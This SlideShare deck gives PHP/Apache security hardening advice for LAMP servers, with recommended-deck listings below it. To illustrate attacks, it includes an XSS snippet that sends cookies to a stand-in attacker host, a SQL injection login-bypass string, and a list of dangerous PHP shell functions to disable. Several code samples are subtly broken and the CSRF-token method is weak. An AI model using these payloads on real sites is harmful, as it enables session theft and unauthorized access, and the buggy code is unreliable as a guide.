SlideShare a Scribd company logo

LAMP security practices

Download as ODP, PDF
Amit Kejriwal
Amit Kejriwal
Technology
1 of 19
LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html

Recommended

How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Presentation (PPT)
Presentation (PPT)Presentation (PPT)
Presentation (PPT)webhostingguy
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Rits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRight IT Services
 
Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1beckman16
 
A 2-2 php on windows azure
A 2-2 php on windows azureA 2-2 php on windows azure
A 2-2 php on windows azureGoAzure
 
PHP on Windows Azure
PHP on Windows Azure PHP on Windows Azure
PHP on Windows Azure Microsoft Openness Japan
 
Serving Moodle Presentation
Serving Moodle PresentationServing Moodle Presentation
Serving Moodle Presentationwebhostingguy
 

Recommended

How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...
How to install and configure lamp (linux,apache mysql mariadb,php) with jooml...CloudMinister Technologies Pvt. Ltd
 
Presentation (PPT)
Presentation (PPT)Presentation (PPT)
Presentation (PPT)webhostingguy
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Rits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRits Brown Bag - PHP & PHPMyAdmin
Rits Brown Bag - PHP & PHPMyAdminRight IT Services
 
Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1Drupalxamppxp 1229687989691791 1
Drupalxamppxp 1229687989691791 1beckman16
 
A 2-2 php on windows azure
A 2-2 php on windows azureA 2-2 php on windows azure
A 2-2 php on windows azureGoAzure
 
PHP on Windows Azure
PHP on Windows Azure PHP on Windows Azure
PHP on Windows Azure Microsoft Openness Japan
 
Serving Moodle Presentation
Serving Moodle PresentationServing Moodle Presentation
Serving Moodle Presentationwebhostingguy
 
Install
InstallInstall
Installmrdisconnect9
 
Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQLThings Lab
 
Prod java-error
Prod java-errorProd java-error
Prod java-errorRamakrishna Chava
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015Shaiffulnizam Mohamad
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation Geminate Consultancy Services
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apachebaran19901990
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: IntroThings Lab
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5RaGaZoMe
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on SolarisTelkom Institute of Management
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.xsetankecos
 
Introduction to Flow3
Introduction to Flow3Introduction to Flow3
Introduction to Flow3Web Essentials Co., Ltd.
 
Cent os 5 ssh
Cent os 5 sshCent os 5 ssh
Cent os 5 sshAlejandro Besne
 
Power shell
Power shellPower shell
Power shellRajkiran Swain
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityakashdprajapati
 
Sql related links
Sql related linksSql related links
Sql related linksEmmanuel Mugume Joshua
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionssalissal
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 
Ec2 Commands
Ec2 CommandsEc2 Commands
Ec2 Commandssnusmumrik
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 

More Related Content

What's hot

Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQLThings Lab
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation Geminate Consultancy Services
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apachebaran19901990
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: IntroThings Lab
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5RaGaZoMe
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.xsetankecos
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityakashdprajapati
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionssalissal
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 

What's hot (20)

Install
InstallInstall
Install
 
Databases and MySQL
Databases and MySQLDatabases and MySQL
Databases and MySQL
 
Prod java-error
Prod java-errorProd java-error
Prod java-error
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0
 
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation How to install odoo 15 steps on a ubuntu 20.04 lts system installation
How to install odoo 15 steps on a ubuntu 20.04 lts system installation
 
Config websocket on apache
Config websocket on apacheConfig websocket on apache
Config websocket on apache
 
PHP Programming: Intro
PHP Programming: IntroPHP Programming: Intro
PHP Programming: Intro
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on Solaris
 
Doc quickinstall 3.x
Doc quickinstall 3.xDoc quickinstall 3.x
Doc quickinstall 3.x
 
Introduction to Flow3
Introduction to Flow3Introduction to Flow3
Introduction to Flow3
 
Cent os 5 ssh
Cent os 5 sshCent os 5 ssh
Cent os 5 ssh
 
Power shell
Power shellPower shell
Power shell
 
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise securityMuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
MuleSoft ESB Payload Encrypt Decrypt using anypoint enterprise security
 
Sql related links
Sql related linksSql related links
Sql related links
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessions
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation Instructions
 
Ec2 Commands
Ec2 CommandsEc2 Commands
Ec2 Commands
 

Viewers also liked

2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin PartnersFabio Lombardi
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Fabien Potencier
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 

Viewers also liked (10)

2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin Partners
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to LAMP security practices

Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Servermanugoel2003
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSigsiu.NET
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptLecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptSreejithVP7
 
PHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpPHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpaimaq9a
 

Similar to LAMP security practices (20)

Download It
Download ItDownload It
Download It
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Server
 
Web Security
Web SecurityWeb Security
Web Security
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Security talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! websiteSecurity talk: Fortifying your Joomla! website
Security talk: Fortifying your Joomla! website
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
4.4 PHP Session
4.4 PHP Session4.4 PHP Session
4.4 PHP Session
 
secure php
secure phpsecure php
secure php
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Web application security
Web application securityWeb application security
Web application security
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and Configuration
 
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.pptLecture 11 - PHP - Part 5 - CookiesSessions.ppt
Lecture 11 - PHP - Part 5 - CookiesSessions.ppt
 
PHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for phpPHP tutorials , php tutorials for beginners , tutorials for php
PHP tutorials , php tutorials for beginners , tutorials for php
 

Recently uploaded

Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Recently uploaded (20)

Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
